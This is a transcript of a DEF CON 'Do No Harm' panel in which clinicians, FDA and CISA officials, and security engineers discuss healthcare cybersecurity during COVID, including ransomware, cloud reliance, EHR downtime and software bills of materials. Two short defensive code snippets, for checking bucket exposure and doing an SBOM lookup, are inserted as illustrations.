Mired in the hell of a global pandemic, hospital capacity stressed to its limit, doctors and nurses overworked and exhausted... surely the baddies would cut us a little slack and leave little 'ol healthcare alone for a bit, right? Well, raise your hand if you saw this one coming. Another year of rampaging ransomware, of pwned patient care- only this time backdropped by the raging dumpster fire that is COVID. Can we once and for all dispel with the Pollyannas telling us that nobody would knowingly seek to harm patients? And if we can't convince the powers that be- whether in the hospital C-suite or in DC- that we need to take this $%& seriously now, then what hope do we have for pushing patient safety to the forefront when things return to some semblance of normal? With a heavily curated panel including policy badasses, elite hackers, and seasoned clinicians - D0 N0 H4RM remains the preeminent forum where insight from experts collide with the ingenuity and imagination of the DEF CON grassroots to inspire activism and collaboration stretching far beyond closing ceremonies. Moderated by physician hackers quaddi and r3plicant, this perennially packed event always fills up fast - so make sure you join us. As always- the most important voice is yours.
|
10.5446/54198 (DOI)
|
Welcome, DEF CON, to the Do No Harm panel. If you're joining us for the first time, this is a panel looking at the complexities of the hacker community and healthcare. We're joined by an amazing panel of people who will introduce themselves shortly. But before I begin, I want to introduce our other moderator, Replicant. Hey guys, Replicant or Jeff here. Very happy and honored to be back with you today. For those of us who are joining asynchronously and watching this virtually, we hope you're doing well. We're sad to not see you in person, but understand that that's the best choice at this time. And we look forward to a DEF CON where we can all get together in person, happy and healthy. My name is Jeff, as mentioned. I'm an anesthesiologist by training. And I work with quaddi doing some security research on the side down here at UC San Diego. A man who needs no introduction, but do us a favor, and for those who may not be aware of the glory that is Josh Corman, give us a quick intro and a little bit about what you do. And then all of our subsequent panelists can also say hi. Sure. Well, I'm Josh Corman. I'm one of the founders of I Am The Cavalry, about eight years ago, August 1. But very important to disclose right now, because of some work I did on a congressional healthcare task force that ended in 2017, when the pandemic started, Director Krebs at the time asked me to come serve the country for a year as part of the CARES Act. So I am the chief strategist for the pandemic response on the CISA COVID task force at CISA, the Cybersecurity and Infrastructure Security Agency. So if you want to spot the Fed, guilty as charged, at least for a temporary emergency hire. So I'm here in my official capacity. But if we touch upon things that happened before the pandemic, I may be wearing a different hat. Awesome. Gab, will you introduce yourself? Yes, I can do that. So I am a cloud security engineer currently working in healthcare, doing a lot in the insurance space and in the regulation space as well. I also do some medical device research and my background is actually in genetic science and neuroscience. So I kind of had that crossover, actually got into information security through medical devices. So this is a near and dear subject to me. Awesome. Stephanie. Hey, everyone. So I'm Stephanie Domas. I'm currently the director of strategic security and communications at Intel. And so I'm right now really focused on the critical role that hardware and firmware plays in security. But more importantly to this conversation, I spent about seven years previous to that focused specifically on medical device cybersecurity. So I did a lot of consulting with medical device manufacturers, healthcare providers, really digging into the bits and bytes of how do you design and build and maintain more secure medical devices? Wonderful. And last but not least, Jessica. Sure. I am Jessica Wilkerson. I'm a senior cyber policy advisor, we go back and forth between advisor and analyst, at the FDA, the Food and Drug Administration. So my job is medical device cybersecurity pretty much all day, every day, but from the government angle. So I guess I am the other Fed in the room. Forgive the awkward camera angle. I am technically on vacation right now, but you all are so important, I decided I had to do this panel for you.
We're going to kick off the panel today with an understanding that there's a big elephant in the room, which is, if this talk is about hacking healthcare and all the complexity of this, there's been a pretty serious issue going on for over a year, the elephant in the room being of course COVID. And we wanted to underscore that before we began just to discuss a couple of things. One, that there's some renewed urgency in the need to address the resiliency of healthcare. We've seen a lot of failures. We've been seeing them for a long time. Now with the pandemic as a backdrop, it's now more important than ever for us to really address this key issue, as well as to learn more about what we failed in, what we can do better, and how us as hackers can really contribute towards this mission of improving the safety of healthcare, not just in the United States, but all the way across the world. And then to open up the first question to the panel, we wanted to talk about hackers and the amazing research that they do into medical devices and critical hospital infrastructure. It seems like not a year goes by where we don't see some amazing research being done, hacking infusion pumps or insulin pumps, attacks on HL7 and other types of healthcare-specific issues. And they tend to come out into the media. My first question to the panel is, we haven't seen a lot of that this last year. Why? I'll take a stab. So I have been involved in or witness to some coordinated vulnerability disclosures over the last year. Perhaps they're just not as public or revealed at conferences, or perhaps they're happening in a more collegial, behind-the-scenes way with a little less sensationalism. But the vulnerabilities are certainly there and the talent pool is certainly there, but maybe others also figured there was a lot on the plates of the medical industry at the moment and are exercising some discretion. But there's probably other reasons as well. Wonderful. Josh, your answer to my question was that we seem to be seeing some research, it's just not very public yet. I wanted to reach out to the rest of the panel, Stephanie, Jessica, Gab, your thoughts on what's going to happen here in the next year or so with the medical device research we really haven't been seeing over the pandemic. So I'll jump in. So building on what Josh said, there is activity happening. So I think part of the reason you're not seeing as many headlines around it is because of the maturity of those coordinated vulnerability disclosure processes, which is an excellent thing. But I think the other piece of it is also around the maturity of the media and knowledge in the space. So I think we're starting to reach a point where vulnerabilities being responsibly disclosed by manufacturers is business as usual. So instead of every time one of these disclosures gets posted by a medical device manufacturer there being sensational headlines around it, that's becoming business as usual. So there are still vulnerabilities getting posted. They're being released by medical device manufacturers, but they're not getting picked up in those sensationalist news cycles, which I think is a great testament to just the maturation in the industry. It's actually a good thing that these are being disclosed and it's not worth sort of the scare tactics that we had seen maybe earlier on in the space. Yeah. I would really echo that. I mean, as part, oh, God. Okay, good. I was actually unmuted. I thought I was going to have an issue, but I would echo that from the FDA space.
I mean, this is my job. I do vulnerability response for medical devices. And so let me assure you there is no shortage of medical device vulnerabilities, because if there were, I would have a much easier job than I do. But like Stephanie and like Josh are saying, the industry has really come a long way in terms of maturity, and not just the industry, not just the researchers. The FDA has also matured with what we've seen and what we've gone through and what we've experienced. And so our response, I think, also influences the way that a lot of these sometimes get reported. And I am actually very happy to report that in a lot of cases now, we'll get a vulnerability, we have the internal expertise within FDA to do our own analysis of patient safety risks, and then we just sort of give it to the teams. We give it to the reviewers to say, go forth and work with the medical device manufacturer and get the thing fixed, and then they do it. And it's just like Stephanie said, it's just business as usual. You know, from the engineering perspective, I think additionally, we're being pulled in so many directions right now. I think there's different things happening across the entire industry and not just in the healthcare space. So I know that, like, my team and the work that I do, we have just so many different projects involving different types of technology and different things across the industry. So it's been a little bit harder to try and focus on the medical devices specifically. Let me just kind of pull back things a little bit in general and say that at the last Do No Harm, which was all virtual on Discord, I think we were still kind of a little bit in the acute shock period of everything that was going on with respect to the pandemic. And now we are 18 months into this, and we have really seen, Christian, clinically how much of an impact it has had on how we currently practice medicine, and how we're likely to do so in the future. I'm curious, just to kind of set the stage for some of the questions we're running into later, what are some of the sort of lessons or changes in perspective that you have all had as a result of being able to kind of sit with this for a little bit longer and decompress? I don't want to say, obviously, that we're close to being out of it, but now that we're a little bit removed from that acute crisis period, where have you sort of changed and how do you look at the space as a whole and the major pain points and problems that you're thinking about, and what sort of surprised you about that entire process? I'm going to want to go last on this one. You said you do want to go last. Gab, did you have something you wanted to say? It's interesting for FDA and coming at it from the healthcare federal government angle. We all went on remote work I think in like March, but of course healthcare, you cannot work remote in healthcare. I think Jeff and Christian, you probably know that better than anybody. The patients still have to go to the hospital, people still have to see doctors. All of these things still have to carry on. Healthcare is so incredibly highly digitized that we already knew that we had this reliance on digital technologies, and Josh, I don't know, your overdependence on, you have this phrase that you use which you can repeat when you speak, but we knew we were dependent. That wasn't the secret.
I think the extent to which we were dependent and the ease with which critical functionality can be disrupted, on accident, on purpose, for whatever reason, just really underscored the criticality of figuring out cybersecurity in healthcare to a more significant degree than we have right now. We have come incredibly far from when, Josh, you started I Am The Cavalry, and Stephanie, when you were with MedSec and all of that, but we still have an incredible way to go, and I think the pandemic was a little bit humbling in that sense of revealing that we had a lot of this work still ahead of us. At least for me, just speaking about the trends I saw in the industry, for the first half of it I would say we were exponentially increasing our cyber risk in the healthcare space by just moving devices around, pop up clinics, standing up like beds in parking lots. The cybersecurity risk was growing exponentially, yet from a consultant's perspective I can tell you that there were no spare cycles for tackling that risk at the time. There was a lot of technical debt taken on very early in the pandemic around cybersecurity because everyone's top priority was just, is it working? We just have to make it work. The last six months or so, I would say, is when I started to see that technical debt being cashed in, you're starting to see people get their heads above water in the healthcare space and try to now redeem that technical debt and get rid of it. It's been interesting seeing that cycle of now people are finally coming back up for air and trying to tackle the spaghetti monster that was made for very good reasons. So I'll try to be brief on some of these things. I referred back to that congressional task force for healthcare and cybersecurity that we had as part of the Cybersecurity Act of 2015. We started in 2016 and finished Mother's Day weekend 2017, when WannaCry affected 40% of the UK's healthcare delivery. So we knew a bunch of seams and cracks in the US ability to provide medical care. We knew many of them. We flagged several. Some got started, like the SBOM work and other good reforms. But the pandemic just took all those seams and cracks and really just overstressed and strained and sprained and broke many more. So we were hoping that ransomware crews would realize they too live in the world and they too would be a victim of degraded and delayed patient care. But instead, as we feared, there was an elevated volume and variety of deliberate disruption to healthcare delivery, nursing homes, PPE, ventilator supply chains early in the pandemic. Building on some of the great things said prior, people did have to stand up spaghetti monsters, I love that phrase, out of a necessity to do their jobs or to respond to the various stages of the pandemic. So they had their old attack surface and now a new one, often using unsupported technologies that couldn't be patched in an emergency even if they wanted to. And worse, because a lot of elective surgeries that are the top revenue generators for a lot of these institutions couldn't happen, people were laying off and furloughing IT staff and IT security staff last summer. And while they did somehow claw back some of that tech debt, we know from that same task force that our estimate at the time was 85% of the hospitals in the US don't have a single cybersecurity person on staff.
So we're often giving cyber hygiene advice and platitudes like implement zero trust or implement multi-factor authentication when they don't have any money. So the degree to which a lot of these healthcare institutions were what I now call target rich and cyber poor, living below Wendy Nather's security poverty line, really has gotten worse during the pandemic as well. And some of the analysis that we had, I don't know the final count of CARES Act hires, we hired data scientists, infectious disease specialists, physicians like Dr. Ruben Pasternak that I know you two work with. And through this fusion center, we started looking at what are the impacts of the pandemic and the ransoms on the nation's ability to provide medical care. We track 55 things called national critical functions, NCFs. These are the things that affect national security, national economic security and national health and public safety. The one that's been in the red zone and the purple zone for most of the pandemic is called provide medical care. And this is what two of you do professionally every day. We looked at severe strains throughout the pandemic, initially noticing a new problem because of the pandemic, which was cascading failures. So it used to be that if you had a ransom or an outage or some power problem, you would merely divert ambulances to the next nearby facility. And that's kind of predicated on the next nearby facility being able to receive anybody. So when everyone's at a saturated level or in the red zone themselves, a failure in any single hospital tended to have cascading stressors or failovers in nearby facilities. So Christian, I heard in your amazing testimony to House Energy and Commerce similar sentiments. So we started studying that as well. Then we started looking at something very poorly covered in the media, but the CDC tracks something really important every year, every month, called excess deaths. And this is the difference between expected deaths and actual deaths, by condition, by month, by state and at the national level. And when the US hit that February milestone of 500,000 lost Americans to COVID, we also hit a different milestone of 150,000 lost Americans to non-COVID conditions that are otherwise treatable, very treatable. The number one age demographic of that was 25 to 44 year olds. The young folks that could have been saved, but for excessive loads on our healthcare delivery across the country. So these are time sensitive things like heart attacks, strokes, cancer, where time matters, minutes matter, hours matter, days or weeks. So Christian and others on this panel in the past, we often cite the New England Journal of Medicine article that says 4.4 minutes of delay during a marathon can be the difference between life and death and increased mortality rates for heart attacks. We know with strokes, the difference in life and death could be one, three or four hours. So what did four weeks of interruption in the state of Vermont do, with the UVM Medical Center and 118 facilities in upstate New York, Vermont and New Hampshire? So again, where minutes matter, we know that delayed and degraded patient care affects outcomes, including mortality rates. We were deeply concerned about this, and I'm almost done with some of these truth bombs. But when we looked with data scientists for the first time in this fusion center, we started to say, is there a relationship between capacity levels and mortality rates and excess deaths?
And we're starting to share this data with the public, but without getting into the inflection points, we did see a strong and positive correlation between something like ICU bed count and excess mortality, excess deaths, four and six weeks later. So we got kind of a leading indicator that we could tell if a hospital or region or a state was going to incur excess deaths, if they were starting to reach too high of a capacity level, and then ask the really tough question that I think Do No Harm cares about, which is, can cyber disruption precipitate or accelerate or cause that harm to worsen? And of course, we know a fire is hot and water is wet. So of course, any degraded and delayed patient care from any source can do this. But we did start asking uncomfortable questions and looking at the states hardest hit by that concerted effort to disrupt healthcare during the months of October and November. And adjusting for all the other variables, in a state like Vermont, it was very clear that electronically disrupted hospitals achieved that excess death red zone much faster than their peer group. So again, if minutes and hours are the difference in life and death, and you're in a geography where you can't get to the next nearby facility. We should stop asking, can cyber attacks lead to loss of life? We've answered the question. There's enough statistical evidence now to show this. And some of these will be easier and smaller inflection points post pandemic when we can go back to fuller capacity and slack in the system. But some of the system dynamics revealed show that if you don't have next best alternative proximal care within a certain radius, then that cyber disruption will cause adverse events to patient care. So I was really pleased to see your testimony, Christian, say very similar things, but you know, it's a somber set of recognitions, but we can at least move past debating if there's an impact from a lack of cyber resilience and now start talking about what the hell do we do about it. And we want to make sure that we link arms with CDC and HHS and FDA and others as we go back to Congress and leaders post pandemic, because we have a lot of work to do. And many of these can't institute multimillion dollar cybersecurity measures. So what is to be done? I think part of the answer is going to come from the creativity of the hacker community here. There's a lot to get back to there. Yeah, so we're going to circle back to a number of points there, but I wanted to ask, you know, in the spirit of this theme of what have you seen or what have you learned over this period: you're a cloud security expert. Have you seen different organizations, whether healthcare or non-healthcare, attempt to address the technical debt by moving a lot of operations to the cloud? And then what do you sort of foresee as the implications of that with respect to the attack surface and how we're thinking about these problems like ransomware and other focused attacks? Yeah, so there was a huge push, I think, kind of near the beginning of the pandemic where a lot of companies moved to the cloud, and it's only gotten, I guess, bigger, the movement's only gotten bigger. It's kind of accelerated that move for a lot of companies that were planning it. It does increase the attack surface, because people don't understand the cloud environment completely sometimes.
I think there's a lot of education to be had between, you know, in the relationship between the cloud provider and what their responsibility is versus what your responsibility is as the person who is putting data in the cloud, and that's where we see a lot of the breakdowns is not understanding that it's the customer responsibility to secure the data and not the cloud service provider. They're just securing the platform that the data is on. So things like that, I think are going to continue to be a problem. I know we're seeing a lot more big breaches as far as cloud environments go. So just even open buckets on the internet, low hanging fruit, stuff like that. So yeah, I think it's going to continue to get worse before it gets better. And Jessica, I'm interested to hear a little bit about how you and FDA at large have sort of changed your thinking a little bit, because we have sort of moved from this conception of the importance of individual vulnerabilities and contained devices, which is still, you know, obviously very important. But now everything living in an ecosystem, understanding some of the effects of just the degraded infrastructure and how that can adversely affect patient care. I mean, FDA is obviously focused on patient safety, medical devices are your purview, but how do you start thinking about things like ransomware within that context, combining it into a situation where you may have medical devices that are supported by cloud infrastructure and in sort of how that branches to include the entire ecosystem and not just an individual device or an individual patient. Yeah, so I'm actually going to follow up on this originate, I had already unmuted in everything of GABS point on the, you know, sort of the rush to the cloud and what that means and the different responsibilities that the different parties have. And to sort of synthesize the follow up I had to that and then the questions you asked for FDA, there are medical devices, right? You can pick up something and it is a medical device. There are also medical devices that are systems and it's, you know, that you may have the device that will actually deliver the care, but the calculations as to how much of a dose to give a patient or how long for the medical device to run or whatever else it may be. That's taking place somewhere else. That's taking place on a different computer. That's taking place in the cloud. That's taking place, whatever. So for us, for the FDA, that whole thing is the medical device. The medical device is the thing. The medical device is also the entire system that is necessary to deliver the care. And we saw this happen earlier this year. This was one of the first times, at least, that we've had it confirmed and really hit the news where a disruption in the cloud service availability of a medical device manufacturer led to the unavailability of care for patients for an extended period of time. And the devices themselves were fine. There was nothing wrong with the devices. The devices weren't ransomware. There was no malware on the devices. They worked perfectly well. The calculations to figure out how much the treatment that the patient needed happened in the cloud. So because the cloud wasn't available, the devices didn't work. And so for us, one, this was a little bit of, not a new thing. Like we had always conceptualized that this could be a problem that we were going to have to deal with. 
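As a concrete illustration of the shared-responsibility point made above about data in the cloud, the sketch below shows one way a customer-side check for an accidentally public storage bucket might look. It assumes the AWS boto3 library, configured credentials, and a made-up bucket name; it is only a sketch of the idea, not a complete cloud audit, and other providers expose equivalent controls through different APIs.

# A sketch of a customer-side check for a publicly exposed S3 bucket.
# Assumes boto3 is installed and AWS credentials are configured; the
# bucket name used at the bottom is hypothetical.
import boto3
from botocore.exceptions import ClientError

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def bucket_looks_public(s3_client, bucket_name):
    """Heuristic: True if the public-access block is missing or incomplete,
    or the bucket ACL grants access to all (or all authenticated) users."""
    try:
        block = s3_client.get_public_access_block(Bucket=bucket_name)
        settings = block["PublicAccessBlockConfiguration"]
        fully_blocked = all(settings.values())
    except ClientError as err:
        if err.response["Error"]["Code"] == "NoSuchPublicAccessBlockConfiguration":
            fully_blocked = False  # no public-access block configured at all
        else:
            raise
    acl = s3_client.get_bucket_acl(Bucket=bucket_name)
    public_grant = any(
        grant.get("Grantee", {}).get("URI") in PUBLIC_GROUPS
        for grant in acl.get("Grants", [])
    )
    return public_grant or not fully_blocked

if __name__ == "__main__":
    client = boto3.client("s3")
    # "example-phi-exports" is a made-up bucket name used purely for illustration.
    if bucket_looks_public(client, "example-phi-exports"):
        print("Bucket may be reachable from the public internet; review its policy and ACLs.")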
But it really, it took a little bit of a perspective switch to go from, oh, we have to look at whether or not the device itself is being hacked, whatever you want to, you know, whatever hacked means, whether or not there's malware or ransomware or whatever else is on the device to maybe the system is just unavailable because the system is multiple parts spread over multiple locations and one of those locations is not available. And so for us, and now for a lot of the medical device manufacturers that we work with, this is something that we're asking them about. We're simply saying, what is your plan? Really do you have one is the implied question there? And sometimes that that's not even, the answer to that is not always yes. What is your plan for if the cloud or for remote service or if the connectivity goes away? Can you still deliver care? And so that's been an interesting perspective in paradigm shift or maturity or evolution if you want to follow that. Can I add on to that? So the other kind of thinking from the healthcare provider space that the interesting impact I saw from this increased adoption of the cloud was sort of pre pandemic. It was really common that when you went to a hospital and you had a medical device that had a cloud component, one of the early questions that would happen is, is there an on prem version of this? So hospitals were really uncomfortable with systems, medical devices that had the ability for under normal use to send patient information outside of their hospital. So hospitals really wanted that on prem solution. So manufacturers had a lot of pressure that they wanted to innovate with the cloud, but there was that demand for on prem solution. And so I saw a real opening up of that risk tolerance from the hospital space where now towards we get halfway through this pandemic, that doesn't start to be the start of the conversation. The hospitals are now just assuming that there's an off prem component to these systems. They're doing their cyber due diligence, right? They're asking the right questions about those components, but that acceptance of a system that is not just on prem has increased dramatically. And so that's been a very interesting change without adoption is that there was kind of a force acceptance for hospitals update their risk tolerance for systems that weren't just on prem. Those are all great insights and I will say just being adjacent to this space, I would confirm all of that and also that the conversations evolving, not just to let's not have an on prem solution, we're okay with the cloud solution or remote solution, but that that could potentially be an answer for some of their internal cybersecurity concerns, meaning as Jeff or as Josh mentioned, the task force reported that nearly 85% of hospitals in estimation lacked a full time security professional. And so this is not a problem that is being solved very quickly. And so they're left with this question, it's almost like a selling point from some manufacturers to say, well, we have a cloud solution in which we can secure this data better than you could potentially do at your own institution. Therefore, it's almost being seen as like a security upsell. And I will say that this is also very commonly cited as a reason to go to cloud hosting for the electronic health record, you know, as we talk about the ecosystem of healthcare, so much technology required to take care of patients. 
One of the most important elements of that is medical devices, but another really important part of that is the electronic health record. And I jokingly call it the operating system of healthcare, you can't do anything in a hospital without the electronic health record, you can't admit a patient, you can't order drugs or treatments or tests, you can't even review the notes without the electronic health record. As we see now a push to really host all of that content in cloud services, usually by electronic health record vendors, it is part of their selling process to say this is more secure. In fact, they cite it as a reason for why you should invest in it, because if your hospital is ransomed, then you can still access your electronic health records through some web portal. And no one's ever talking about that consolidation of services into one focal point that, if attacked and ransomed, for example, would lead to the failure of the electronic health record not for one hospital or five hospitals, but for hundreds or potentially thousands of institutions across the country at once. And that's not anything anyone's talking about. So thank you all for bringing that to light. My question... Well, can I, Christian, can I just really quickly, there's another thing that really gets me about this. And I think that we saw this with some of the ransomware talks on hospitals today, like to the point of like, oh, just put your electronic health record in the cloud, then if you get ransomware, you can still access it. On what computer, on what device? Am I going to pull up my personal phone and be like, hold on, I need to pull up your personal medical record? What, are you okay? It's fine. It's fine. I'm like, that doesn't make any sense. Yeah. All the endpoints are owned. They're all ransomed. And it's funny because one of the common backup strategies employed by hospitals is actually to have what they call a cold storage workstation. So a lot of hospitals that are well resourced have these, but a lot of hospitals still don't even have this. They plan for a downtime of their electronic health record, like a fiber line gets cut or they lose access to the data center or whatever it's going to be. There are computers that are supposed to be in most areas that are a day late in their medical records, meaning that they are hosted somewhat locally. They still have connectivity, but the idea is that you'll have at least yesterday's electronic health record data. And that's what people are citing as a potential mitigation to lack of availability of medical records. So those are the same endpoints that get owned and ransomed. Your backup solution doesn't anticipate that. So what I'm trying to get at here is that a lot of hospitals, healthcare delivery organizations, prepare for technical downtime in the context of the power goes out, a fiber line gets cut, a patch goes awry, and they're down for three, five, eight hours, 24 hours at the most. And guess what? You can use all these other systems. There's not a plan for technical failure of a catastrophic nature such as ransomware, wherein there are no endpoints you can trust, or they all might be ransomed, such that your current technical backups simply will not work. So great insight, everyone. And I really appreciate all that. Anything else before we move on to the next question on this?
So one of the things that really brought tears to my eyes thinking about was just how quickly we got vaccines out, right? That amazing feat, which was the science, the development of the vaccine, the research, the data collection, the statistics, and then the subsequent production of it is a miracle, you know, an honest, amazing thing that happened. We had heard of attacks on the vaccine pipeline development, you know, is, to my knowledge, none of that impacted the time at which we got the vaccine, but we can imagine in the future, you know, how many other vulnerable parts of healthcare we have. We have hospitals, the medical devices, but we have a whole medical research world. We have the vaccine development world. Can everyone kind of reflect a little bit about how the pipeline in which we bring any drugs out, new vaccines itself is very vulnerable to these types of things, and we should be talking more about it. And what do we do about it? Because clearly, there was already a failure during one of our humanities, you know, arguably most important points. Maybe I'll start the answer and others can fill it in without getting into, you know, sensitive names. Many of you heard at least about Operation Warp Speed where we gave money to accelerate the development and distribution of vaccines for the first time in our species on coronaviruses. We weren't even sure it would work. So we had backup plans for therapeutics and diagnostics. But there were various stages of that relay race with different accidents and adversaries with different manifestations of harm. And it was pretty precarious and it's not as obvious as just do world-class cybersecurity. So the stages we looked at where the first stage was really R&D and clinical trials, when it was fill and finish and scale production and fill and finish, then it was cold chain, cold storage distribution all the way through administration. In the first stage, it was a lot of espionage, you know, like can we find out who's working on what and steal the recipes or intellectual property. In the second stage, you started to see more financially motivated criminals that wanted to profit off disruption or ransoms or DDoS or other forms of extortion. And the last stage, Murphy was really the top adversary of just logistical confusion and working between the federal level and the state level. But yeah, we in record time created effective vaccines and made enough of them for most people to get it. The weak link in the whole chain without changing topics is that while we beat biology faster than bureaucracy, it was really tough to figure out who owns, you know, combating MISTIS and malinformation and information operations that sowed a lot of vaccine hesitancy across a number of categories and a number of demographics. So while we were racing to develop cures to achieve herd immunity and protect the American interest and the global interest, the weak link in the chain seemed to be fighting misperceptions or misinformation sufficiently to get enough of this adoption. So we're not yet done the pandemic work, but I think each of those revealed that once you got past the really big R&D, the real challenge is that target rich cyber poor because some of these very rare manufacturers had three IT people, zero security people and no security budget, you could sneeze on them and they would probably lead to the death of a lot of people. 
So we had a really harrowing job of identifying, engaging, informing, trying to protect them while there was a lot of people throwing Molotov cocktails around. So a lot of successful attacks, but hopefully not successful delay to what you've now seen produced. But it shatters your assumptions that people are doing good cybersecurity. A lot of these players are brand new and haven't yet matured to the point where they can be resilient against even a script kitty. I agree that misinformation is basically one of the worst weak points, but I did spend the majority of the pandemic kind of on the other side of the vaccine table. I was involved in one of the vaccine manufacturers studies in a genetic consultant capacity. So my main concern as the study kind of progressed was the amount of information that was going to so many places and we didn't know what that place's security looked like. So I mean, the study I worked on had thousands of research sites that we were trying to recruit people at and each one of those research sites has their own security and we've got the entire information about the vaccine going to these sites, hundreds of pages of information about the structure and the function and things like that. And it made me really nervous because you don't know what their security looks like. You don't know if they're printing it out and tossing them in the street or leaving USB drives with that stuff on it everywhere. And I think the information control is another one of our weak links that we might need to start to address in the future. Yes, I mean, it's interesting. I think those are those points really well. You know, the wild variation in capability between everyone all along the supply chain, but I almost go the opposite direction. My concern is that everyone is the same in that everybody is using the same hardware and everybody is using the same operating systems and everybody is using the same software and hardware because what we're seeing or what we've experienced is when we get vulnerabilities that pop up in Windows or in whatever it is, shared operating systems, shared applications, you've got SolarWinds, you've got Cassay, you've got the set and the other thing. We were all seeing how interconnected everybody is in relying on the same software and hardware. Everybody within the supply chain is immediately hit. The medical device manufacturers, the pharma companies, the HVOs, the federal government were all suddenly experiencing the same problem at the same time. And that obviously creates a huge problem of are we all prepared to respond to it? If we're not prepared to respond to it, what do we do? And I don't think it's a secret that there's a wild variation even in the federal government in terms of, one, the agencies themselves being able to secure themselves, but different sectors being more or less involved in the cybersecurity of their sectors. So obviously here I am, FDA has been very forward leaning in medical device cybersecurity for a long time. But some other sectors are really just starting to begin their cybersecurity journey of working with their sectors in trying to recognize that everything is digital. All manufacturing lines are digital. Nobody's hand making much of anything anymore these days. You've got robots making everything. So if something goes down on the manufacturing line, the product is affected. The manufacturing line is affected. The supply chain downstream is affected. 
And so the intricate and really delicate nature of all of our supply chain cybersecurity perspective I think is really fascinating and also very frightening. My goodness, that perfectly segues into our next question, which I'll first to start with Stephanie. And then we'll love to get everyone's opinion on this because it seems to be, to me, a very uncontroversial topic, but has become increasingly controversial. I don't understand why. The concept of software bill of materials, this thought that to combat these types of supply chain concerns, we need increasing transparency about what constitutes the software and hardware that we use insofar as being able to identify when a vulnerability is found, what devices and what software will be vulnerable to that. So there's this concept of software bill of materials, a nutrition label if you will, what components are within a particular device or software suite itself. Clearly seems to be compelling argument in medical devices for, for exactly what you've mentioned. Can everyone here quickly just reflect upon why, you know, what about software bill materials, how will that address these concerns if it will, and how do we operationalize that because that seems to be a big focal point of some of the criticism. Perhaps start with Stephanie. So it's an interesting one to bring up because it's, like you said, it's a very polarizing topic when you talk to people and I'm in the camp that the software bill materials is actually a really good thing. But playing the devil's advocate, when I do hear people kind of take a more, a harder stand against the software bill materials, they're always citing things like, is that not just giving up a blueprint basically to my device to the bad guys. I'm of the mindset that, no, the bad guys can figure that stuff out anyway, but that is one of the common criticisms I hear about it. It's been interesting watching the last couple months of, I think, a big sort of force multiplier in the space is the most recent executive order. I think it was May 15th that really just accelerated this idea of software bill materials. And so I've seen a big shift from the thinking of, should we do it? Should we not do it? And more to, okay, how do we do it? Well, on the surface sounds like a really simple thing, but actually when you get down into how do you make one, how do you do it consistently? How does everyone speak the same language? But then more importantly, how do you actually use it to your point, Christian? How do you operationalize and get value from it? There are so many TBDs in that life cycle that it becomes really interesting conversation, but I think that most recent executive order has actually, I think, taken some of those naysayers and said, okay, well, you can still be a naysayer, but this is happening. So that's been good. The other piece I see as a kind of resistance to the idea of it, and again, the executive order kind of dwarfs all of this, but this idea that it's almost fixating on the wrong piece of the puzzle. In a lot of regards, the reason you want finished product software bill materials is so that if you were a user or a consumer of that device and there's a new vulnerability and some commodity operating system to Jessica's point, you don't have to wait to hear from the manufacturer. You can kind of do your own due diligence and threat management to say, oh, wait, I have 10 things that are affected by that. 
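To make that "do your own due diligence" step concrete (this is an illustration added here, not something shown in the panel): a finished-goods SBOM is just a machine-readable component list, for example CycloneDX-style JSON, and the hospital-side check is a lookup against it when a new advisory lands. A rough sketch with made-up component and advisory data:

    # Illustrative only: a trimmed, CycloneDX-flavored component list for a
    # hypothetical infusion pump, and the kind of lookup a hospital could
    # script when an advisory is published for one of the components.
    import json

    sbom_json = """
    {
      "bomFormat": "CycloneDX",
      "components": [
        {"name": "busybox",       "version": "1.31.1"},
        {"name": "openssl",       "version": "1.1.1g"},
        {"name": "vxworks-tcpip", "version": "6.9"}
      ]
    }
    """

    advisory = {"component": "openssl", "affected_versions": ["1.1.1g", "1.1.1h"]}

    sbom = json.loads(sbom_json)
    hits = [c for c in sbom["components"]
            if c["name"] == advisory["component"]
            and c["version"] in advisory["affected_versions"]]

    for c in hits:
        print(f"Device is exposed: ships {c['name']} {c['version']}")

The point the panelists make below is precisely about whether users should have to run this kind of check themselves or whether manufacturers should be doing it for them.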
So the criticism I've heard is that the bigger underlying issue is that there is a struggle right now to basically rely on the manufacturer to give you timely communications and that if the manufacturer was actually giving you timely communications, you shouldn't be the one having to do that level of threat management. You shouldn't need the software bill of materials because you should be able to rely on getting timely and accurate information from the manufacturer. So I sort of agree with what those criticisms are pointing at, that maybe the answer is more of how do we make that timeline more succinct, but I think the software bill of materials is a good place to start as kind of a common stakeholder. And let's try to solve this together. And yes, it would be great to get to the point where you don't have to manage software bills of materials because manufacturers are actively telling you the risk, but we're not there yet. Well, I think the other thing is, and so I'm going to reveal my absolute adoration for us on here very quickly. But for a lot of the users that I work with on a daily basis, it's with the healthcare delivery organizations themselves, so the actual hospitals, the chief information security officers, the chief information officers at these places, they want this information. The manufacturers have actually tried to be like, no, no, no, no, no, don't worry, we'll just do it for you. It's not going to be fine on us, it's going to be fine. And they're like, no, you will give us this information because, well, and so let me, let me back up. So I love software bill of materials. I think it's fantastic. I actually am glad I got to speak before Josh because I think otherwise he would have stolen my line, which is that you can't protect what you don't know you have. And that's the whole thing about what software bill of materials is about. If I don't know what I'm running because software is not, you know, nobody is, you know, going up to this, you know, this big chunk of, of Marvel software and like chiseling out a new program. That's not how you make software these days. You build software out of other little pieces of software. And if you don't know what the other little pieces of software are, then when there's a problem with it, you have no idea what's going on. You're like, well, the device is freaking out. Don't know why. It could be one of the 50 components that this thing is made out of. So software bill of materials helps you address that problem. Is it a perfect solution? No. Is it a start? Yes. And the interesting thing for us, so like the FDA is going to require, it's in guidance. Guidance is in voluntary. I can say, something's laughing because this is like, we won't go here, but guidance is voluntary, but it's guidance and it's in guidance. The medical device manufacturers have to have, it's cyber security bill of materials now, but it's the same thing as software bill of materials. But for us in the executive, you know, we're going to require it. The executive order says they'll shout through it for certain situations, but for us, that's not even what it's about anymore. It's getting into contract language. Household delivery organizations are essentially going to medical device manufacturers and saying, we're putting in that you must give us software bill of materials in our contract. Therefore, if you don't, one, we're not going to buy your product. And two, if you don't do it, it's breached with contracts. So like, forget what the government says. 
